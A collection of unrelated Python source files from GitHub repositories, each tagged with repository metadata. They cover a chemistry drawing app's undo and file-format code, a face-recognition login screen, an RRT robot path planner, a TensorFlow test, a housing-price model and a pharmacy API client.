o.__dict__[a1] = o.__dict__[a2]
changed_objs.add(o)
# check which objects need to redraw
to_redraw = changed_objs.copy()
for o in changed_objs:
# atom is changed, bonds and marks also need to redraw
if o.class_name == 'Atom':
to_redraw |= set([b for b in o.bonds])
# when atom is moved, marks also moved (but its relative pos does not change).
# Then marks are not redrawn automatically, so we are redrawing them manually
to_redraw |= set(m for m in o.marks)
# if bond changed, attached atoms must be redrawn first
elif o.class_name == 'Bond':
to_redraw |= set([a for a in o.atoms])
to_redraw -= to_be_removed
for o in to_be_removed:
o.clearDrawings()
# now redrawing
to_redraw = sorted(to_redraw, key=lambda obj : obj.redraw_priority)
for o in to_redraw:
o.paper = self.paper
o.draw()
self.paper.objects = self.top_levels[:]
| ksharindam/chemcanvas | chemcanvas/undo_manager.py | undo_manager.py | py | 6,542 | python | en | code | 1 | github-code | 13 |
1166225514 |
from pathlib import Path
from tkinter import Tk, Canvas, Entry, Text, Button, PhotoImage
from tkinter import *
import cv2
import face_recognition
import sqlite3
import numpy as np
import qr_detection
from tkinter import messagebox
import homepage as hp
from datetime import datetime
def go_detect_qr(current_window,correct_str,name):
global authorized
if authorized==0:
messagebox.showerror('error','the user is registered but has not been authorized by the admin')
now = datetime.now()
dt_string = now.strftime("%d/%m/%Y %H:%M:%S")
with open("login_log.txt",'a') as f:
f.write(f"{name} had face authenticated but was not authorized to enter "+dt_string+"\n")
current_window.destroy()
hp.homepage()
else:
current_window.destroy()
qr_detection.detect_qr(correct_str,name)
def retry(cam,window_detect_face):
# print(" TRY AGIAN CALLED")
cam.release()
cv2.destroyAllWindows()
window_detect_face.destroy()
detect_face()
def get_image():
global img
global frame
f = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
img = cv2.resize(f, (700, 394))
img = PhotoImage(data=cv2.imencode('.png', img)[1].tobytes())
return img
def update_cam(cam_label,window_detect_face,cam):
global img
global frame
ret, frame = cam.read()
rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
boxes = face_recognition.face_locations(rgb, model='hog')
encodings = face_recognition.face_encodings(rgb, boxes)
names = []
if ret:
img = get_image()
cam_label.config(image=img)
cam_label.image = img
window_detect_face.after(10,lambda: update_cam(cam_label,window_detect_face,cam))
def detect_face():
global window_detect_face
idx = None
correct_str = None
name = None
OUTPUT_PATH = Path(__file__).parent
ASSETS_PATH = OUTPUT_PATH / Path(r"assets\frame9")
def relative_to_assets(path: str) -> Path:
return ASSETS_PATH / Path(path)
window_detect_face = Toplevel()
window_detect_face.title("Detect Face")
window_detect_face.geometry("1440x900")
window_detect_face.configure(bg = "#FFFFFF")
canvas = Canvas(
window_detect_face,
bg = "#FFFFFF",
height = 900,
width = 1440,
bd = 0,
highlightthickness = 0,
relief = "ridge"
)
canvas.place(x = 0, y = 0)
canvas.create_text(
40.0,
30.0,
anchor="nw",
text="SecureLabs",
fill="#000000",
font=("Poppins SemiBold", 25 * -1)
)
canvas.create_text(
41.0,
175.0,
anchor="nw",
text="Face\nRecogination",
fill="#000000",
font=("Poppins SemiBold", 45 * -1)
)
canvas.create_text(
40.0,
358.0,
anchor="nw",
text="Make sure you are\nin visible range",
fill="#000000",
font=("Poppins SemiBold", 26 * -1)
)
global cam_bck_image
global ty_again_button_image
global go_ahead_green_button_image
global go_ahead_red_button_image
cam_bck_image = PhotoImage(
file=relative_to_assets("image_1.png"))
cam_frame = Frame(window_detect_face,width=1009,height=859)
cam_frame.pack_propagate(0)
cam_frame.place(x = 414,y = 21)
cam_label = Label(cam_frame,width=700,height=394)
cam_label.place(relx = 0.5,rely = 0.5,anchor=CENTER)
bg_img = Label(cam_frame, image=cam_bck_image)
bg_img.pack()
bg_img.lower()
cam = cv2.VideoCapture(0)
ty_again_button_image = PhotoImage(
file=relative_to_assets("button_1.png"))
try_again_button = Button(
window_detect_face,
image=ty_again_button_image,
borderwidth=0,
highlightthickness=0,
command=lambda: retry(cam,window_detect_face),
relief="flat"
)
try_again_button.place(
x=95.0,
y=675.0,
width=212.0,
height=53.0
)
go_ahead_red_button_image = PhotoImage(
file=relative_to_assets("button_2.png"))
go_ahead_red_button = Button(
window_detect_face,
image=go_ahead_red_button_image,
# state="disabled",
borderwidth=0,
highlightthickness=0,
command=lambda: print(""),
relief="flat"
)
go_ahead_red_button.place(
x=93.0,
y=585.0,
width=212.0,
height=53.0
)
go_ahead_green_button_image = PhotoImage(
file=relative_to_assets("button_3.png"))
go_ahead_green_button = Button(
window_detect_face,
image=go_ahead_green_button_image,
state="disabled",
borderwidth=0,
highlightthickness=0,
command=lambda: go_detect_qr(window_detect_face,correct_str,name),
relief="flat"
)
go_ahead_green_button.place(
x=93.0,
y=585.0,
width=212.0,
height=53.0
)
go_ahead_green_button.lower()
name_label = Label(
window_detect_face,
text= "NOT RECOGINSED",
font=("Poppins SemiBold", 26 * -1)
)
name_label.place(x = 40.0,y = 480.0)
db = sqlite3.connect("app_data/user_data.sqlite")
c = db.cursor()
global frame
global img
ret, frame = cam.read()
rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
boxes = face_recognition.face_locations(rgb, model='hog')
encodings = face_recognition.face_encodings(rgb, boxes)
names = []
# name = None
global authorized
authorized = 0
for encoding in encodings:
# retrieve all stored face encodings from database
c.execute('SELECT * FROM USERS')
rows = c.fetchall()
stored_encodings = [np.frombuffer(row[5], dtype=np.float64) for row in rows]
names = [row[1] for row in rows]
# indices = [row[0] for row in rows]
strs = [row[6] for row in rows]
auth_values = [row[7] for row in rows]
# compute distances between current face encoding and stored encodings
distances = face_recognition.face_distance(stored_encodings, encoding)
min_idx = np.argmin(distances)
min_distance = distances[min_idx]
# if the minimum distance is less than a threshold, the face is recognized
if min_distance < 0.6:
name = names[min_idx]
name_label['text'] = name
# idx = indices[min_idx]
correct_str = strs[min_idx]
authorized = auth_values[min_idx]
now = datetime.now()
dt_string = now.strftime("%d/%m/%Y %H:%M:%S")
with open('login_log.txt','a') as f:
f.write(f"{name} tried to login got face authenticated successfully "+dt_string+"\n")
else:
name = 'unknown'
now = datetime.now()
dt_string = now.strftime("%d/%m/%Y %H:%M:%S")
with open("login_log.txt",'a') as f:
f.write("unknown person tried to login "+dt_string+"\n")
# draw bounding box and label around the face
# top, right, bottom, left = boxes[0]
# cv2.rectangle(frame, (left, top), (right, bottom), (0, 255, 0), 2)
# cv2.putText(frame, name, (left, top - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.75, (0, 255, 0), 2)
# print(" person is recogonized as ",name)
if name is not None and name!='unknown':
go_ahead_red_button.lower()
go_ahead_green_button.lift()
go_ahead_green_button['state'] = NORMAL
go_ahead_red_button['state'] = DISABLED
if ret:
img = get_image()
cam_label.config(image=img)
cam_label.image = img
window_detect_face.after(10,lambda: update_cam(cam_label,window_detect_face,cam))
window_detect_face.resizable(False, False)
# window_detect_face.mainloop() | chirag-3/secure-lab-access-using-face-recognition-and-qr-code-scan | face_detection1.py | face_detection1.py | py | 8,003 | python | en | code | 0 | github-code | 13 |
71455690579 | with open('27test-lshastin') as f:
a=f.read()
a=a.split('\n')
a.pop(0)
a=list(map(int,a))
k=a.pop(0)
c=0
a=[x%2 for x in a]
for i in range(len(a)):
b=[]
for z in range(i,len(a)):
b.append(a[z])
if (b.count(1)==b.count(0)) and (len(b)>=k):
c+=1
print(c) | artgunBLACKMAESTRO/EGE | task27/27-lshastin.py | 27-lshastin.py | py | 292 | python | en | code | 0 | github-code | 13 |
23171025189 | from networkit import Graph
class MongoDBStorage:
def storeGraph(self, collection, graph: Graph):
converted_graph = {"nodes": []}
for node in graph.nodes():
associatednodes = []
graph.forEdgesOf(node, lambda left, right, weight, edge_id:
(associatednodes.append(right))
)
converted_graph["nodes"].append({
"id": node,
"associatednodescount": len(associatednodes),
"associatednodes": associatednodes
})
collection.insert_one(converted_graph)
| kshaposhnikov/twitter-graph-model | tgml/loader/mongodbstorage.py | mongodbstorage.py | py | 599 | python | en | code | 0 | github-code | 13 |
17514468979 | from django.urls import path
from . import api_views
app_name = 'spacyal_api'
urlpatterns = [
path('retrievecases/', api_views.RetrieveCasesView.as_view(),
name='retrievecases'),
path('progress_model/', api_views.GetProgressModelView.as_view(),
name='progress_model'),
path('download_model/', api_views.DownloadModelView.as_view(),
name='download_model'),
path('download_cases/', api_views.DownloadCasesView.as_view(),
name='download_cases'),
path('project_history/', api_views.GetProjectHistory.as_view(),
name='project_history'),
]
| sennierer/spacyal | spacyal/api_urls.py | api_urls.py | py | 601 | python | en | code | 5 | github-code | 13 |
10720266149 | #!/usr/bin/env python3
from cmath import pi
from math import dist
import random
from turtle import pos
from typing import List
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from fwd_kinematics import *
JointValues = List[float]
JointValuesList = List[JointValues]
from pylib import Communication
com = Communication()
class RRT_connect:
class Node:
"""
创建节点
"""
def __init__(self, p):
self.point=p
# self.path = [] # 路径,作为画图的数据,也可以理解成保存的边集
self.parent = None #父节点
def __init__(self,start,stop,rand_area=None,expand_dis=pi/100, goal_sample_rate=5,max_iter=1000):
self.start=start
self.stop=stop
self.area=rand_area
self.step=expand_dis
self.max_iter=max_iter
self.tree_list_1 = []
self.tree_list_2 = []
self.tree_list_1.append(self.Node(start))
self.tree_list_2.append(self.Node(stop))
def generate_random_point(self):
# x:-0.664 0.336
# y:-0.736 0.264
# z:0.102 0.881
seed_1=random.random()
seed_2=random.random()
seed_3=random.random()
seed_4=random.random()
seed_5=random.random()
seed_6=random.random()
rand_1=2*pi*seed_1+(-pi)
rand_2=2*pi*seed_2+(-pi)
rand_3=2*pi*seed_3+(-pi)
rand_4=2*pi*seed_4+(-pi)
rand_5=2*pi*seed_5+(-pi)
rand_6=2*pi*seed_6+(-pi)
rand_point=self.Node([rand_1,rand_2,rand_3,rand_4,rand_5,rand_6])
return rand_point
def Extend_Tree(self):
fig = plt.figure()
ax = Axes3D(fig)
p1=fwd_kinematics([self.start[0], self.start[1],self.start[2],self.start[3], self.start[4],self.start[5]])
ax.scatter(p1[0],p1[1],p1[2])
p2=fwd_kinematics([self.stop[0], self.stop[1],self.stop[2],self.stop[3], self.stop[4],self.stop[5]])
ax.scatter(p2[0],p2[1],p2[2])
# plt.show()
for i in range(self.max_iter):
rand_point=self.generate_random_point()
step=self.step
nearest_point=self.Find_nearest(rand_point.point,self.tree_list_1)
distance=self.Cal_distance(rand_point.point,nearest_point.point)
if distance>step:
p_new=self.Generate_point_new(distance,rand_point,nearest_point)
else:
p_new=rand_point
print(p_new)
print(rand_point.point)
print(nearest_point.point)
p_new=self.Node(p_new)
p_new.parent=nearest_point
# p_new.path=[p_new.parent.path,p_new.point]
#check collision
# mid_p_new=[p_new.point[0]/2,p_new.point[1]/2,p_new.point[2]/2]
if not self.Check_collision(p_new.point):
self.tree_list_1.append(p_new)
nearest_point2=self.Find_nearest(p_new.point,self.tree_list_2)
distance2=self.Cal_distance(p_new.point,nearest_point2.point)
if distance2>step:
p_new2=self.Generate_point_new2(distance2,p_new,nearest_point2)
else:
p_new2=rand_point
# print()
p_new2=self.Node(p_new2)
p_new2.parent=nearest_point2
# mid_p_new2=[p_new2.point[0]/2,p_new2.point[1]/2,p_new2.point[2]/2]
if not self.Check_collision(p_new2.point):
self.tree_list_2.append(p_new2)
if self.Check_end():
break
p3=fwd_kinematics([p_new.point[0], p_new.point[1],p_new.point[2],p_new.point[3], p_new.point[4],p_new.point[5]])
ax.scatter(p3[0],p3[1],p3[2])
p4=fwd_kinematics([p_new2.point[0], p_new2.point[1],p_new2.point[2],p_new2.point[3], p_new2.point[4],p_new2.point[5]])
ax.scatter(p4[0],p4[1],p4[2])
plt.show()
def Cal_distance(self,p,q):
# dis=sqrt((p[0]-q[0])**2+(p[1]-q[1])**2+(p[2]-q[2])**2)
dis=dist(p,q)
return dis
def Check_collision(self,p):
hsCol = com.hasCollision(p)
clr = com.clearance(p)
if hsCol==True:
return True
else:
return False
def Find_nearest(self, p, tree):
dis_s=[]
for i in range(len(tree)):
point_temp=tree[i]
dis=self.Cal_distance(point_temp.point,p)
dis_s.append(dis)
inx=np.argmin(dis_s)
return tree[inx]
def Generate_point_new(self,distance,rand_point,nearest_point):
# print(rand_point.point[0])
# p_new_1=(self.step/distance)*(rand_point.point[0]-nearest_point.point[0])+nearest_point.point[0]
# p_new_2=(self.step/distance)*(rand_point.point[1]-nearest_point.point[1])+nearest_point.point[1]
# p_new_3=(self.step/distance)*(rand_point.point[2]-nearest_point.point[2])+nearest_point.point[2]
# p_new_4=(self.step/distance)*(rand_point.point[3]-nearest_point.point[3])+nearest_point.point[3]
# p_new_5=(self.step/distance)*(rand_point.point[4]-nearest_point.point[4])+nearest_point.point[4]
# p_new_6=(self.step/distance)*(rand_point.point[5]-nearest_point.point[5])+nearest_point.point[5]
new_point=[]
for i in range(6):
value=nearest_point.point[i]+(self.step/distance)*(rand_point.point[i]-nearest_point.point[i])
new_point.append(value)
return new_point
# return [p_new_1,p_new_2,p_new_3,p_new_4,p_new_5,p_new_6]
def Generate_point_new2(self,distance,rand_point,nearest_point):
# p_new_1=((distance-self.step)/distance)*(nearest_point.point[0]-rand_point.point[0])+rand_point.point[0]
# p_new_2=((distance-self.step)/distance)*(nearest_point.point[1]-rand_point.point[1])+rand_point.point[1]
# p_new_3=((distance-self.step)/distance)*(nearest_point.point[2]-rand_point.point[2])+rand_point.point[2]
# p_new_4=((distance-self.step)/distance)*(nearest_point.point[3]-rand_point.point[3])+rand_point.point[3]
# p_new_5=((distance-self.step)/distance)*(nearest_point.point[4]-rand_point.point[4])+rand_point.point[4]
# p_new_6=((distance-self.step)/distance)*(nearest_point.point[5]-rand_point.point[5])+rand_point.point[5]
new_point=[]
for i in range(6):
value=nearest_point.point[i]+(self.step/distance)*(rand_point.point[i]-nearest_point.point[i])
new_point.append(value)
return new_point
def Check_end(self):
for i in range(len(self.tree_list_1)):
for j in range(len(self.tree_list_2)):
if self.Cal_distance(self.tree_list_1[i].point,self.tree_list_2[j].point)>self.step:
continue
else:
return True
def compilePath(start: JointValues, stop: JointValues) -> JointValuesList:
print('start = ', start)
print('stop = ', stop)
if len(start) != 6 or len(stop) != 6:
print('Array length mismatch')
return None
poseList = list()
poseList.append(start)
hsCol = com.hasCollision(start)
clr = com.clearance(start)
print("start:", "iscollision",hsCol, "clearance", clr)
poseList.append(stop)
hsCol = com.hasCollision(stop)
clr = com.clearance(stop)
print("stop:", "iscollision", hsCol, "clearance", clr)
# fill in the poses
return poseList
def DergeeToRadius(degree):
return degree/180*pi
if __name__ == '__main__':
# com._mainLoop(compilePath)
rrt=RRT_connect(start=[-2.194994195566857, -2.204066153002122, -1.782691206638569, -2.296184584257166, -0.2502436962787926, 1.653367853706748],stop=[-2.194994195566857, -1.866362961559723, -1.422051457171162, -2.994527525166973, -0.2502436962787904, 1.653367853706747])
rrt.Extend_Tree()
| vineetjnair9/DT_sim | RRT_Connect_Du.py | RRT_Connect_Du.py | py | 7,979 | python | en | code | 0 | github-code | 13 |
45187569796 | import tensorflow as tf
from tests.cnn.image_input_4d import ImageInput4D
from tfoptests.nn_image_ops import NNImageOps
from tfoptests.persistor import TensorFlowPersistor
def test_conv_1():
# [4, 2, 28, 28, 3]
image_input = ImageInput4D(seed=713, batch_size=4, in_d=2, in_h=28, in_w=28, in_ch=3)
in_node = image_input.get_placeholder("image", data_type=tf.float32)
constr = NNImageOps(in_node)
# in_channels must match between input and filter.
# [filter_depth, filter_height, filter_width, in_channels, out_channels].
filter = [2, 5, 5, 3, 4]
constr.set_filter_size(filter)
# Must have strides[0] = strides[4] = 1.
stride = [1, 5, 4, 3, 1]
constr.set_stride_size(stride_val=stride)
in1 = constr.execute("conv3d")
constr.set_image(in1)
in2 = constr.flatten_convolution(in1)
out_node = tf.matmul(in2, tf.Variable(tf.random_uniform([280, 3])), name="output") # calc required dims by hand
placeholders = [in_node]
predictions = [out_node]
tfp = TensorFlowPersistor(save_dir="conv_1")
predictions_after_freeze = tfp \
.set_placeholders(placeholders) \
.set_output_tensors(predictions) \
.set_test_data(image_input.get_test_data()) \
.build_save_frozen_graph()
print(predictions_after_freeze[0].shape)
if __name__ == "main":
test_conv_1()
| kgnandu/TFOpTests | tests/cnn/test_conv_1.py | test_conv_1.py | py | 1,358 | python | en | code | 0 | github-code | 13 |
14249253026 | '''
Author: rootReturn0
Date: 2020-09-08 10:53:58
LastEditors: rootReturn0
LastEditTime: 2020-09-08 17:30:38
Description:
'''
from pandas.core.common import random_state
from sklearn import datasets
from sklearn.preprocessing import StandardScaler
from sklearn.feature_selection import *
from sklearn.model_selection import train_test_split
from sklearn.metrics import *
import math
import matplotlib.pyplot as plt
import pandas as pd
FEATURE_NUM = 3
data = pd.read_csv('boston.csv')
# house = datasets.load_boston()
# X = house.data
# Y = house.target
X = data.drop(columns='MEDV')
Y = data['MEDV']
models=['lr','SVM','GBDT','xgboost']
def dataPlot():
nums = len(X.columns)
columns =3
rows = math.ceil(nums/columns)
plt.figure(figsize=(10,12))
for i in range(nums):
plt.subplot(rows,columns,i+1)
plt.plot(X.iloc[:,i],Y,"b+")
plt.title(label=X.iloc[:,i].name)
plt.subplots_adjust(hspace=0.8)
plt.show()
def featurePlot(feature):
plt.scatter(data[feature],data['MEDV'])
plt.show()
def preprocessing():
global data
data = data.drop(data[(data['MEDV']>=50) & (data['RM']<8)].index)
def bestFeatures(num):
stand = StandardScaler()
stand_x = stand.fit_transform(X)
best = SelectKBest(f_regression, k=num).fit(stand_x,Y)
# 最相关特征的index
best_index = best.get_support()
print(best_index,'\n',X.columns.values)
best_features = X.columns.values[best_index]
print(best_features)
return best_features
def train(features,models=[]):
x_train, x_test, y_train, y_test = train_test_split(X[features], Y, test_size=0.2, random_state=11)
print(X.shape)
print(x_train.shape)
print(x_test.shape)
# print(house)
for model in models:
# classifier = selectModel(modelname=model)
# classifier.fit(x_train, y_train)
print(model,'\n')
predicter = selectModel(model)
predicter.fit(x_train,y_train)
preds = predicter.predict(x_test)
performance(y_test, preds, modelname=model)
def selectModel(modelname):
if modelname == "lr":
from sklearn.linear_model import LogisticRegression
clf = LogisticRegression()
elif modelname == "GBDT":
from sklearn.ensemble import GradientBoostingClassifier
clf = GradientBoostingClassifier()
elif modelname == "RF":
from sklearn.ensemble import RandomForestClassifier
clf = RandomForestClassifier(n_estimators=100)
elif modelname == "xgboost":
from xgboost import XGBClassifier
clf = XGBClassifier(
learning_rate=0.01,
n_estimators=1000,
max_depth=4,
min_child_weight=3,
gamma=0.1,
subsample=0.8,
colsample_bytree=0.8,
reg_alpha=1,
objective='binary:logistic', #multi:softmax
nthread=8,
scale_pos_weight=1,
seed=27,
random_state=27
)
elif modelname == "KNN":
from sklearn.neighbors import KNeighborsClassifier as knn
clf = knn()
elif modelname == "MNB":
from sklearn.naive_bayes import MultinomialNB
clf = MultinomialNB()
elif modelname == "SVM-P":
from sklearn.svm import SVC
clf = SVC(kernel = 'poly', probability = True)
elif modelname == "SVM-R":
from sklearn.svm import SVC
clf = SVC(kernel = 'rbf', probability = True)
else:
pass
return clf
def performance(y_true, y_pred, modelname=""):
report = classification_report(y_true, y_pred)
print("模型{}预测结果:\n{}".format(modelname,report))
return report
if __name__ == "__main__":
# dataPlot()
# featurePlot('RM')
preprocessing()
# featurePlot('RM')
best_features = bestFeatures(FEATURE_NUM)
train(best_features,models) | RootReturn0/ML | predict_clf.py | predict_clf.py | py | 3,945 | python | en | code | 0 | github-code | 13 |
70312266257 | from typing import Callable, Dict, List, Type
from os import getenv, path
from inspect import signature
import requests
from pydantic import parse_obj_as
from dotenv import load_dotenv
from models import CategoriesResponse, InstructionsResponse, PriceResponse, ProductsResponse, RegionsResponse, SearchResponse
from exceptions import ApiException, HttpCodeException, API_EXCEPTIONS
load_dotenv()
class ZdravcityAPI:
"""
Оболочка над API Zdravcity.ru
"""
def __init__(self, token: str, test: bool = True):
self.__token = token
self.__test = test
self.__host = getenv("ZDRAVCITY_TEST_HOST") if test else getenv("ZDRAVCITY_HOST")
self.__headers = {
'Cookie': 'BITRIX_SM_ABTEST_s1=1%7CB; BITRIX_SM_OLD_FAVORITES_CHECKED=Y; PHPSESSID=2l1jo8ppfpk52b94c6cffkqmd9',
"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:87.0) Gecko/20100101 Firefox/87.0",
}
if test:
self.__headers.update({
'CF-Access-Client-Id': getenv('ZDRAVCITY_CF_Access_Client_Id'),
'CF-Access-Client-Secret': getenv('ZDRAVCITY_CF_Access_Client_Secret'),
'Authorization': getenv('ZDRAVCITY_Authorization'),
})
def __api_method(self, path: str, return_type: Type, params: Dict = {}):
payload = dict(token=self.__token)
payload.update(params)
response = requests.post(f"{self.__host}{path}", headers=self.__headers, json=payload)
if not (200 >= response.status_code < 300):
raise HttpCodeException(f"Response status code: {response.status_code}")
json_response = response.json()
if json_response['status'] != 0:
for exception in API_EXCEPTIONS:
if json_response['status'] == exception.STATUS:
raise exception
return parse_obj_as(return_type, json_response)
def get_categories(self) -> CategoriesResponse:
return self.__api_method("/api.client/getCategoryList/", CategoriesResponse)
def get_products(self, start: int=0, count: int=1) -> ProductsResponse:
return self.__api_method(
path="/api.client/obtainEsEima/",
return_type=ProductsResponse,
params={'start': start, 'count': count}
)
def get_regions(self) -> RegionsResponse:
return self.__api_method("/api.client/getRegionList/", RegionsResponse)
def get_instructions(self, guid: str, start: int=0, count: int=1) -> InstructionsResponse:
return self.__api_method(
path="/api.client/obtainEsInstructionEima/",
return_type=InstructionsResponse,
params={'guidInstruction': guid, 'start': start, 'count': count}
)
def get_prices(self, region_code: str, categories: List[str]) -> PriceResponse:
"""Получение цен и остатков по активным позициям из справочника товара """
return self.__api_method(
path="/api.client/getPrices/",
return_type=PriceResponse,
params={"region_code": region_code, "show": categories}
)
def search_all(self, word: str, where: str = "NAME", region_code: str = "vladimir" ) -> SearchResponse:
return self.__api_method(
path="/api.client/getSearchResultAll/",
return_type=SearchResponse,
params={"region_code": region_code, "word": word, "where": where}
)
if __name__ == "__main__":
api = ZdravcityAPI(getenv("ZDRAVCITY_TOKEN"))
result = api.search_all("аспирин", region_code="vladimir")
print(result)
# prices_response = api.get_prices(region_code="vladimir", categories=["igly-i-shpritsy"])
# length_response = len(prices_response.data.items)
# print(length_response)
# | KlukvaMors/zdravcity_api | zdravcity.py | zdravcity.py | py | 3,891 | python | en | code | 1 | github-code | 13 |
23162185849 | from app_data import App
from common import float_to_str
from drawing_parents import hex_color, hex_to_color
from molecule import Molecule
from marks import Charge, Electron
from arrow import Arrow
from bracket import Bracket
from text import Text, Plus
import io
import xml.dom.minidom as Dom
# top level object types
tagname_to_class = {
"molecule": Molecule,
"arrow": Arrow,
"plus": Plus,
"text": Text,
"bracket": Bracket,
}
obj_element_dict = {}
objs_to_read_again = set()
class IDManager:
def __init__(self):
self.clear()
def clear(self):
self.id_to_obj = {}# for read mode
self.obj_to_id = {}# for write mode
self.atom_id_no = 1
self.bond_id_no = 1
self.mark_id_no = 1
self.other_id_no = 1
def addObject(self, obj, obj_id):
self.id_to_obj[obj_id] = obj
def getObject(self, obj_id):
try:
return self.id_to_obj[obj_id]
except KeyError:# object not read yet
return None
def createObjectID(self, obj):
if obj.class_name=="Atom":
new_id = "a%i" % self.atom_id_no
self.atom_id_no += 1
elif obj.class_name=="Bond":
new_id = "b%i" % self.bond_id_no
self.bond_id_no += 1
elif obj.class_name in ("Charge", "Electron"):
new_id = "mk%i" % self.mark_id_no
self.mark_id_no += 1
else:
new_id = "o%i" % self.other_id_no
self.other_id_no += 1
self.obj_to_id[obj] = new_id
# add id attribute if element was already created but id not created
if obj in obj_element_dict:
obj_element_dict[obj].setAttribute("id", new_id)
return new_id
def getID(self, obj):
try:
return self.obj_to_id[obj]
except KeyError:
return self.createObjectID(obj)
def hasObject(self, obj):
return obj in self.obj_to_id
id_manager = IDManager()
class CcdxFormat:
def read(self, filename):
doc = Dom.parse(filename)
return self.readFromDocument(doc)
def readFromString(self, data):
pass
def readFromDocument(self, doc):
ccdxs = doc.getElementsByTagName("ccdx")
if not ccdxs:
return []
root = ccdxs[0]
# result
objects = []
# read objects
for tagname, ObjClass in tagname_to_class.items():
elms = root.getElementsByTagName(tagname)
for elm in elms:
obj = tagname_to_class[elm.tagName]()
obj_read_xml_node(obj, elm)
scale_val = elm.getAttribute("scale_val")
if scale_val:
obj.scale_val = float(scale_val)
objects.append(obj)
# some objects failed because dependency objects were not loaded earlier
while objs_to_read_again:
successful = False
for obj, elm in list(objs_to_read_again):
if globals()[tagname+"_read_xml_node"](obj, elm):
objs_to_read_again.remove((obj, elm))
successful = True
if not successful:
break
id_manager.clear()
objs_to_read_again.clear()
return objects
def generateString(self, objects):
doc = Dom.Document()
doc.version = "1.0"
doc.encoding = "UTF-8"
root = doc.createElement("ccdx")
doc.appendChild(root)
for obj in objects:
elm = obj_create_xml_node(obj, root)
if obj.scale_val != 1.0:
elm.setAttribute("scale_val", str(obj.scale_val))
id_manager.clear()
obj_element_dict.clear()
return doc.toprettyxml()
def write(self, objects, filename):
string = self.generateString(objects)
try:
with io.open(filename, "w", encoding="utf-8") as out_file:
out_file.write(string)
return True
except:
return False
def obj_read_xml_node(obj, elm):
ok = globals()[elm.tagName+"_read_xml_node"](obj, elm)
if not ok:
objs_to_read_again.add((obj, elm))
uid = elm.getAttribute("id")
if uid:
id_manager.addObject(obj, uid)
return ok
def obj_create_xml_node(obj, parent):
obj_type = obj.class_name.lower()
elm = globals()[obj_type+"_create_xml_node"](obj, parent)
obj_element_dict[obj] = elm
# id already created, need to save id
if id_manager.hasObject(obj):
elm.setAttribute("id", id_manager.getID(obj))
return elm
# ------------- MOLECULE -------------------
def molecule_create_xml_node(molecule, parent):
elm = parent.ownerDocument.createElement("molecule")
if molecule.template_atom:
elm.setAttribute("template_atom", id_manager.getID(molecule.template_atom))
if molecule.template_bond:
elm.setAttribute("template_bond", id_manager.getID(molecule.template_bond))
for child in molecule.children:
obj_create_xml_node(child, elm)
parent.appendChild(elm)
return elm
def molecule_read_xml_node(molecule, mol_elm):
name = mol_elm.getAttribute("name")
if name:
molecule.name = name
# create atoms
atom_elms = mol_elm.getElementsByTagName("atom")
for atom_elm in atom_elms:
atom = molecule.newAtom()
obj_read_xml_node(atom, atom_elm)
# create bonds
bond_elms = mol_elm.getElementsByTagName("bond")
for bond_elm in bond_elms:
bond = molecule.newBond()
obj_read_xml_node(bond, bond_elm)
t_atom_id = mol_elm.getAttribute("template_atom")
if t_atom_id:
t_atom = id_manager.getObject(t_atom_id)
if not t_atom:
return False
molecule.template_atom = t_atom
t_bond_id = mol_elm.getAttribute("template_bond")
if t_bond_id:
t_bond = id_manager.getObject(t_bond_id)
if not t_bond:
return False
molecule.template_bond = t_bond
return True
# -------- ATOM -----------
def atom_create_xml_node(atom, parent):
elm = parent.ownerDocument.createElement("atom")
elm.setAttribute("sym", atom.symbol)
# atom pos in "x,y" or "x,y,z" format
pos_attr = float_to_str(atom.x) + "," + float_to_str(atom.y)
if atom.z != 0:
pos_attr += "," + float_to_str(atom.z)
elm.setAttribute("pos", pos_attr)
if atom.isotope:
elm.setAttribute("iso", str(atom.isotope))
# explicit valency
if not atom.auto_valency:
elf.setAttribute("val", str(atom.valency))
# explicit hydrogens. group has always zero hydrogens
if not atom.is_group and not atom.auto_hydrogens:
elm.setAttribute("H", str(atom.hydrogens))
# show/hide symbol if carbon
if atom.symbol=="C" and atom.show_symbol:
elm.setAttribute("show_C", "1")
# text layout
if not atom.auto_text_layout:
elm.setAttribute("dir", atom.text_layout)
# color
if atom.color != (0,0,0):
elm.setAttribute("clr", hex_color(atom.color))
parent.appendChild(elm)
# add marks
for child in atom.children:
obj_create_xml_node(child, elm)
return elm
def atom_read_xml_node(atom, elm):
# read symbol
symbol = elm.getAttribute("sym")
if symbol:
atom.setSymbol(symbol)
# read postion
pos = elm.getAttribute("pos")
if pos:
pos = list(map(float, pos.split(",")))
atom.x, atom.y = pos[:2]
if len(pos)==3:
atom.z = pos[2]
# isotope
isotope = elm.getAttribute("iso")
if isotope:
atom.isotope = int(isotope)
# valency
valency = elm.getAttribute("val")
if valency:
atom.valency = int(valency)
atom.auto_valency = False
# hydrogens
hydrogens = elm.getAttribute("H")
if hydrogens:
atom.hydrogens = int(hydrogens)
atom.auto_hydrogens = False
# read show carbon
show_symbol = elm.getAttribute("show_C")
if show_symbol and atom.symbol=="C":
atom.show_symbol = bool(int(show_symbol))
# text layout or direction
direction = elm.getAttribute("dir")
if direction:
atom.text_layout = direction
atom.auto_text_layout = False
# color
color = elm.getAttribute("clr")
if color:
atom.color = hex_to_color(color)
# create marks
marks_class_dict = {"charge" : Charge, "electron" : Electron}
for tagname, MarkClass in marks_class_dict.items():
elms = elm.getElementsByTagName(tagname)
for elm in elms:
mark = MarkClass()
obj_read_xml_node(mark, elm)
mark.atom = atom
atom.marks.append(mark)
return True
# ----------- end atom --------------------
# -------------- BOND --------------------
short_bond_types = {"normal": "1", "double": "2", "triple": "3",
"aromatic":"a", "hbond":"h", "partial":"p", "coordinate":"c",
"wedge":"w", "hatch":"ha", "bold":"b",
}
# short bond type to full bond type map
full_bond_types = {it[1]:it[0] for it in short_bond_types.items()}
def bond_create_xml_node(bond, parent):
elm = parent.ownerDocument.createElement("bond")
elm.setAttribute("typ", short_bond_types[bond.type])
elm.setAttribute("atms", " ".join([id_manager.getID(atom) for atom in bond.atoms]))
if not bond.auto_second_line_side:
elm.setAttribute("side", str(bond.second_line_side))
# color
if bond.color != (0,0,0):
elm.setAttribute("clr", hex_color(bond.color))
parent.appendChild(elm)
return elm
def bond_read_xml_node(bond, elm):
# read bond type
_type = elm.getAttribute("typ")
if _type:
bond.setType(full_bond_types[_type])
